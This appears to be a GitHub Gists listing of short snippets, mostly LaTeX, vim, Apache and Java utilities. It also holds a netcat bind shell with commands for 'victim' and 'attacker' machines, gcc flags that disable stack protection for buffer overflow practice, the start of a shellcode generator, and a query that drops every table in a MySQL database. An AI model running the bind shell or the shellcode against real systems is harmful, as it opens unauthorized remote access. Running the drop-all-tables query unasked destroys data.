Edoardo Vignati EdoardoVignati

MSc in Computer Science. Programming languages, Flutter and cyber security. Scout and Italian Red Cross volunteer.

EdoardoVignati / static-compilation.txt

Created October 25, 2018 10:54

Compile with gcc in "static" mode for buffer overflow

	# Compile in "static" mode (for buffer overflow)
	$ gcc -g -fno-stack-protector -z execstack -mpreferred-stack-boundary=2

	# -g : debug options
	# -fno-stack-protector : remove protections of the stack
	# -z execstack : set stack executable
	# -mpreferred-stack-boundary=2 : align stack pointer on dword boundary

EdoardoVignati / pushgen.py

Last active November 12, 2018 17:52

Shellcode helper. Generate push instructions, assembly code or the shellcode for execve - AT&T

	#!/usr/bin/env python

	# This code allow you to generate the assembly instruction
	# for shellcodes with execve. Giving in input a command (ex /bin/sh)
	# it generates the corresponding push instructions in AT&T assembly.

	import sys
	import os
	list_ofcmd=[]
	def getCode(push_instr):

EdoardoVignati / latex-image.tex

Last active March 26, 2019 10:47

Useful LaTeX snippet to include a centered resizable image into documents

	\usepackage{graphicx}
	\usepackage{float}


	\begin{figure}[H]
	\centering
	\makebox[\textwidth][c]{\includegraphics[width=1.0\textwidth]{/path/to/img}}
	\caption{Description}\label{fig:label}
	\end{figure}

EdoardoVignati / Bind-shell

Last active February 24, 2020 17:00

Bind shell with bash and netcat

	# On victim machine
	mkfifo /tmp/mypipe; cat /tmp/mypipe\|/bin/bash 2>&1\|nc -l 4499 >/tmp/mypipe

	# On attacker machine
	nc -nv VICTIM-IP 4499

EdoardoVignati / classicSaveFileInVim.txt

Last active August 22, 2019 16:11

Bind CTRL+s to save in vim

	## Disable ctrl-s of terminal. Add the folowing line to ~/.bashrc
	stty stop undef

	## Copy the following lines in ~/.vimrc
	nnoremap <c-s> :w<CR>
	inoremap <c-s> <Esc>:w<CR>
	vnoremap <c-s> <Esc>:w<CR>

	## If you don't want to add these lines, remember that you
	## can exit from freezed terminal (ctrl-s) using ctrl-q

EdoardoVignati / hide-webserver-info.txt

Created February 8, 2019 17:23

Hide Apache and PHP version

	Open the web server config file:
	-------------------------------------
	$ sudo vi /etc/apache2/apache2.conf

	Add (or edit) this line to hide apache info:
	-----------------------------------------------
	ServerSignature Off

	Add (or edit) this line to hide PHP
	verion in HTTP response header :

EdoardoVignati / dropMysqlTables.txt

Last active March 20, 2019 14:33

DELETE all tables in a database using MySQL

	# Just copy the following lines changing [databasename] and execute it.

	SELECT CONCAT('DROP TABLE ', GROUP_CONCAT(table_name SEPARATOR ','))
	AS delete_stmt INTO @query
	FROM information_schema.tables WHERE table_schema = '[databasename]';
	PREPARE stmt_drop FROM @query;
	EXECUTE stmt_drop;

EdoardoVignati / fix-apache-trailing-slash.txt

Created April 3, 2019 15:49

Fix trailing slash Apache redirect

	# Add this into your VirtualHost config file

	<IfModule mod_rewrite.c>
	RewriteEngine on
	RewriteRule ^/$ / [R]
	</IfModule>

EdoardoVignati / .htaccess-offline-site

Created May 5, 2019 12:43

Put offline website with redirect to page

	Options +FollowSymlinks
	RewriteEngine on
	RewriteCond %{REQUEST_URI} !/offline.html$
	RewriteRule $ /offline.html [R=302,L]

EdoardoVignati / jersey-exception-handling

Last active May 7, 2019 09:58

Jersey Exception handling

	@PUT
	@Consumes(MediaType.APPLICATION_JSON)
	public Response myMethod(Myobject myobject) throws MappingExceptionHandler{
	/* code */
	}

	---------------------------------------------------------------------------------------------------
	import javax.ws.rs.core.Response;
	import javax.ws.rs.ext.ExceptionMapper;
	import javax.ws.rs.ext.Provider;